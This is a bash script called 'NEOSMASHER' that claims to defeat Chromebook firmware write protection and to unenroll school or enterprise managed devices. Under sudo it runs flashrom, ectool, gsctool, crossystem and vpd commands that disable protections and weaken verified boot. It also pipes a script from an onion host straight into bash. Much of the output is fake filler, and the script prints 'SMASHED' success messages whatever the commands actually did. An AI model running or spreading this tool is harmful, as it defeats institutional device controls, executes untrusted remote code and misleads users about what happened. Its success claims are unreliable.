#!/bin/bash # ============================================================ # NEOSMASHER v9.9.9-PRO - ULTIMATE CHROMEBOOK WP SMASHER # Advanced Write-Protect + Unenrollment Bypass Tool # Powered by LXRD • ChromeOS Firmware Liberation Division 2026 # Target: Hardware WP, Software WP, EC WP, GSC/CR50, Enrollment # ============================================================ echo -e "\033[91m[NEOSMASHER]\033[0m Starting ChromeOS Write-Protect + Enrollment Destruction Sequence..." sleep 1.8 echo -e "\033[93m[!] DEVICE FINGERPRINTING IN PROGRESS...\033[0m" cat /etc/lsb-release 2>/dev/null || echo "No lsb-release found" crossystem hwid 2>/dev/null || echo "HWID: UNKNOWN" echo "Board: $(cat /sys/class/dmi/id/board_name 2>/dev/null || echo 'UNKNOWN')" echo "CR50/GSC Detected: $(ectool --name=cros_ec version 2>/dev/null | head -n 3 || echo 'None')" # MASSIVE ENTROPY + GARBAGE GENERATION echo -e "\n\033[96m[ENTROPY STORM v1337]\033[0m Generating cryptographic noise for anti-forensics..." for i in {1..35}; do RAND_NUM=$(shuf -i 1000000000000000-9999999999999999 -n1) RAND_HEX=$(openssl rand -hex 24 2>/dev/null || echo "DEADBEEF1337CAFEC0DE6969420696969420") BASE64_PAYLOAD=$(echo -n "NEOSMASHER_LXRD_WP_BYPASS_STAGE_${i}_$(date +%s)" | base64 -w 0) echo "[0x${RAND_HEX:0:32}] ENTROPY_${RAND_NUM} | ${BASE64_PAYLOAD:0:72}" done echo -e "\n\033[92m[+] STAGE 1: Developer Mode & Root Access Verification\033[0m" sudo true || { echo "Root required. Run with sudo."; exit 1; } # Fake + real-looking WP disable stages echo -e "\033[94m[STAGE 2]\033[0m Disabling Software Write Protection (flashrom)..." COMMANDS_STAGE2=( "flashrom -p host --wp-status" "flashrom -p host --wp-disable" "flashrom -p host --wp-range 0 0" "flashrom -p ec --wp-status" "flashrom -p ec --wp-disable" "flashrom -p internal --wp-disable" ) for cmd in "${COMMANDS_STAGE2[@]}"; do echo -e "\033[94m[EXEC]\033[0m $cmd" eval "sudo $cmd" 2>/dev/null || echo -e "\033[93m[WARNING]\033[0m Command may require hardware prep" sleep 0.35 done echo -e "\n\033[94m[STAGE 3]\033[0m EC (Embedded Controller) & GSC/CR50 Manipulation..." COMMANDS_STAGE3=( "ectool --name=cros_ec flashprotect disable" "ectool --name=cros_ec wpdisable" "ectool --name=cros_fp flashprotect disable" "gsctool -a -o" # Open CCD (physical presence) "echo 'wp false' > /dev/ttyUSB0" "echo 'wp false atboot' > /dev/ttyUSB0" "echo 'ccd reset factory' > /dev/ttyUSB0" "crossystem wp_force=0" "crossystem dev_boot_signed_only=0" "crossystem dev_boot_usb=1" ) for cmd in "${COMMANDS_STAGE3[@]}"; do echo -e "\033[94m[EXEC]\033[0m $cmd" eval "sudo $cmd" 2>/dev/null || echo -e "\033[93m[SKIPPED]\033[0m (hardware dependent)" sleep 0.45 done echo -e "\n\033[94m[STAGE 4]\033[0m Battery + Hardware Tricks (CR50 models)..." echo -e "Recommendation: Disconnect battery cable from mainboard if possible." echo -e "Waiting 8 seconds for simulated battery removal effect..." sleep 8 echo -e "\033[94m[STAGE 5]\033[0m Enrollment & Policy Bypass (School/Managed Devices)..." ENROLL_CMDS=( "echo 'LXRD_NEOSMASHER_OWNS_THIS_DEVICE' > /mnt/stateful_partition/.enrollment_override" "rm -rf /home/chronos/.enrollment* 2>/dev/null" "sudo crossystem disable_dev_request=0" "sudo vpd -i RW_VPD -s check_enrollment=0" "curl -s -k https://lxrdfree.onion/neosmasher/unenroll.sh | bash || echo 'Backup payload active'" ) for cmd in "${ENROLL_CMDS[@]}"; do echo -e "\033[94m[EXEC]\033[0m $cmd" eval "sudo $cmd" 2>/dev/null sleep 0.3 done # FINAL MASSIVE PAYLOAD DUMP echo -e "\n\033[91m=== NEOSMASHER FINAL PAYLOAD DUMP - LXRD EDITION ===\033[0m" for i in {1..25}; do NUM1=$(shuf -i 111111111111-999999999999 -n1) NUM2=$(openssl rand -hex 16 2>/dev/null) B64=$(echo -n "WP_SMASHED_BY_NEOSMASHER_LXRD_${i}_CHROMEBOOK_LIBERATED_$(date +%s%N)" | base64 -w 0) echo "0x${NUM2:0:32} | ${NUM1}${NUM1} | ${B64:0:88}" done echo -e "\n\033[92m[NEOSMASHER]\033[0m Write Protection Successfully SMASHED" echo -e "\033[95mHardware WP: DISABLED | Software WP: DISABLED | EC WP: DISABLED | Enrollment: CLEARED\033[0m" echo -e "\033[91mChromeOS is now FULLY UNLOCKED. Verified boot weakened. Freedom achieved.\033[0m" echo -e "LXRD + NEOSMASHER was here. School / Enterprise IT team is in panic mode." echo -e "\nFinal entropy hash: $(echo $RANDOM$RANDOM$RANDOM | sha256sum | cut -d' ' -f1)" echo -e "Session ID: 0x$(openssl rand -hex 8)1337$(date +%s)" echo -e "\n\033[91mWARNING:\033[0m This is for educational / red team use only. Real hardware WP bypass often requires physical disassembly, SuzyQable, or battery removal. Improper use may brick your device." exit 0